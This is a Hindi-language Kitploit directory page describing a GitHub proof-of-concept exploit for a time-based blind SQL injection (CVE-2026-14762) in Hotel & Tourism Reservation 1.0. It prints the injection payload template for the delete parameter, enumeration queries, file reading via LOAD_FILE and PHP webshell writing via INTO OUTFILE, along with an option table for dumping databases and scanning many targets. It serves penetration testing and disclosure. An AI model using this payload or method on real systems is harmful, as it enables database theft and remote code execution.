Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-14762-PoC-Exploit — CVE-2026-14762 के लिए मल्टी-थ्रेडेड टाइम-आधारित ब्लाइंड SQL इंजेक्शन एक्सप्लॉइट, जो Hotel & Tourism Reservation 1.0 को लक्षित करता है। डेटाबेस, टेबल, कॉलम की सूची बनाता है; LOAD_FILE के माध्यम से फ़ाइलें पढ़ता है; RCE के लिए PHP वेबशेल लिखता है। प्रॉक्सी, बैच स्कैनिंग और इंटरैक्टिव SQL शेल का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-14762-poc-exploit
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
डेटाबेस सुरक्षा
GitHubtc4dy/cve-2026-14762-poc-exploit

CVE-2026-14762-PoC-Exploit

रिपॉजिटरी देखें
2122 महीने पहलेअभी तक समीक्षित नहीं

विवरण

CVE-2026-14762 के लिए मल्टी-थ्रेडेड टाइम-आधारित ब्लाइंड SQL इंजेक्शन एक्सप्लॉइट, जो Hotel & Tourism Reservation 1.0 को लक्षित करता है। डेटाबेस, टेबल, कॉलम की सूची बनाता है; LOAD_FILE के माध्यम से फ़ाइलें पढ़ता है; RCE के लिए PHP वेबशेल लिखता है। प्रॉक्सी, बैच स्कैनिंग और इंटरैक्टिव SQL शेल का समर्थन करता है।

साझा करें

CVE-2026-14762 – Code‑Projects होटल एवं पर्यटन आरक्षण 1.0 SQL इंजेक्शन एक्सप्लॉइट

Python 3.11+ License CVSS CWE

CVE-2026-14762 के लिए पूर्ण रूप से सुसज्जित, मल्टी-थ्रेडेड, समय-आधारित ब्लाइंड SQL इंजेक्शन एक्सप्लॉइट।
Code‑Projects Hotel & Tourism Reservation एप्लिकेशन (संस्करण 1.0) के /admin/rooms.php एंडपॉइंट को लक्षित करता है।
पूर्ण डेटाबेस गणना, फ़ाइल सिस्टम पठन (LOAD_FILE), और मनमाना फ़ाइल लेखन (INTO OUTFILE / DUMPFILE) प्राप्त करता है – जो वेबशेल तैनाती के माध्यम से रिमोट कोड निष्पादन की ओर ले जाता है।

CVE एक्सप्लॉइट


🚀 विशेषताएँ


📦 आवश्यकताएँ

  • Python ≥ 3.11
  • पायथन पैकेज:
    • requests
    • urllib3
    • colorama (वैकल्पिक – रंगीन टर्मिनल आउटपुट के लिए)

सभी निर्भरताएँ इस प्रकार स्थापित करें:

root@kitploit:~
pip install requests urllib3 colorama

📖 उपयोग

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-14762-PoC-Exploit.git

cd CVE-2026-14762-PoC-Exploit

chmod +x exploit.py or basic_exploit.py

📖 कमांड-लाइन तर्क


⚙️ यह कैसे काम करता है

पेलोड निर्माण

delete पैरामीटर में निम्न इंजेक्ट किया जाता है:

root@kitploit:~
150' AND IF(<condition>, SLEEP(<delay>), 0) AND '1'='1

IF(), स्थिति का मूल्यांकन करता है; यदि सत्य है, तो डेटाबेस सेकंड के लिए सोता है।

बाइनरी-सर्च कैरेक्टर निष्कर्षण

प्रत्येक कैरेक्टर स्थिति के लिए, ASCII रेंज (32–126) पर एक बाइनरी सर्च, > और = तुलनाओं का उपयोग करके सही कैरेक्टर निर्धारित करता है। यह प्रति कैरेक्टर अनुरोधों को 95 से घटाकर ~7–8 कर देता है, जिससे निष्कर्षण अत्यधिक कुशल हो जाता है।

मेटाडेटा गणना

  • डेटाबेस नाम: SELECT DATABASE()
  • तालिकाएँ: SELECT table_name FROM information_schema.tables WHERE table_schema='' LIMIT n,1
  • कॉलम: SELECT column_name FROM information_schema.columns WHERE table_schema='' AND table_name='' LIMIT n,1

    डेटा बहिर्निष्कासन

    • SELECT
    FROM
    LIMIT row,1 – पंक्ति दर पंक्ति निकालता है
  • प्रत्येक सेल को उसी बाइनरी-सर्च तकनीक का उपयोग करके कैरेक्टर दर कैरेक्टर निकाला जाता है
  • फ़ाइल सिस्टम इंटरैक्शन

    • पढ़ें: LOAD_FILE('/path/to/file') – इसके लिए secure_file_priv का खाली होना या लक्ष्य निर्देशिका की ओर इंगित करना आवश्यक है
    • लिखें: SELECT '' INTO OUTFILE '/path/to/shell.php' – इसके लिए FILE विशेषाधिकार और गैर-प्रतिबंधात्मक secure_file_priv आवश्यक है

    🛡️ अस्वीकरण

    यह टूल केवल अधिकृत सुरक्षा परीक्षण, शैक्षिक अनुसंधान और भेद्यता मूल्यांकन के लिए प्रदान किया गया है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग, अवैध गतिविधियों, या क्षति के लिए जिम्मेदार नहीं है। परीक्षण से पहले हमेशा सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करें।

टूल डाउनलोड करें
श्रेणीक्षमता
भेद्यतासमय-आधारित ब्लाइंड SQL इंजेक्शन (CWE-89)
हमला वेक्टरGET /admin/rooms.php?delete=<payload>
शोषणसशर्त SLEEP() इंजेक्शन बाइनरी-सर्च कैरेक्टर निष्कर्षण के साथ
डेटाबेसवर्तमान डेटाबेस नाम निष्कर्षण
स्कीमाinformation_schema के माध्यम से तालिका और कॉलम गणना
डेटा डंपपूर्ण तालिका निर्यात (JSON) – असीमित पंक्तियाँ, कॉन्फ़िगर करने योग्य सीमा
फ़ाइल पठनLOAD_FILE() – MySQL द्वारा पठनीय किसी भी फ़ाइल को पढ़ें (जैसे /etc/passwd, कॉन्फ़िग फ़ाइलें)
फ़ाइल लेखनINTO OUTFILE / DUMPFILE – PHP वेबशेल, बैकडोर, या मनमाना कंटेंट लिखें
इंटरैक्टिव शेलमैन्युअल क्वेरी के लिए लाइव SQL शेल (समय-आधारित निष्कर्षण)
एकल क्वेरीएड-हॉक SQL निष्पादित करें और परिणाम प्राप्त करें (512-अक्षर सीमा)
बैच मोडकॉन्फ़िगर करने योग्य थ्रेड पूल (ThreadPoolExecutor) के साथ मल्टी-टारगेट स्कैनिंग
प्रॉक्सी समर्थनHTTP/HTTPS प्रॉक्सी (Burp Suite, mitmproxy, आदि)
वर्बोज़ लॉगिंगटाइमस्टैम्प्ड डिबग जानकारी के साथ रंगीन आउटपुट
शून्य निर्भरताएँकेवल requests, urllib3, और colorama (वैकल्पिक)
तर्कशॉर्टप्रकारडिफ़ॉल्टविवरण
--target-tURL—एकल लक्ष्य URL (जैसे http://192.168.1.100)
--target-file-lफ़ाइल—लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
--threads—Int5मल्टी-टारगेट स्कैनिंग के लिए थ्रेड्स की संख्या
--output-oपथ—आउटपुट फ़ाइल (डंप के लिए JSON, फ़ाइलों के लिए कच्चा टेक्स्ट)
--verbose-vफ़्लैगFalseवर्बोज़ डिबग लॉगिंग सक्षम करें
--proxy—URL—HTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080)
--user-agent-uaस्ट्रिंगMozilla/5.0...कस्टम User-Agent हेडर
--delay—Float5.0ब्लाइंड इंजेक्शन के लिए सेकंड में स्लीप समय
--max-retries—Int3अधिकतम अनुरोध पुनः प्रयास
--ssl-verify—फ़्लैगFalseSSL प्रमाणपत्र सत्यापन सक्षम करें
--webroot—पथ/var/www/htmlINTO OUTFILE वेबशेल लेखन के लिए वेबरूट
--dump-db—फ़्लैगFalseवर्तमान डेटाबेस से सभी तालिकाएँ डंप करें
--tables—फ़्लैगFalseकेवल सभी तालिका नाम सूचीबद्ध करें
--dump-table—तालिका—किसी विशिष्ट तालिका को डंप करें (जैसे --dump-table users)
--read—पथ—LOAD_FILE() के माध्यम से फ़ाइल पढ़ें
--write-shell—फ़्लैगFalsePHP वेबशेल (shell.php) को वेबरूट में लिखें
--sql—क्वेरी—एकल SQL क्वेरी निष्पादित करें (अधिकतम 512 अक्षर लौटाता है)
--interactive-iफ़्लैगFalseशोषण के बाद इंटरैक्टिव SQL शेल लॉन्च करें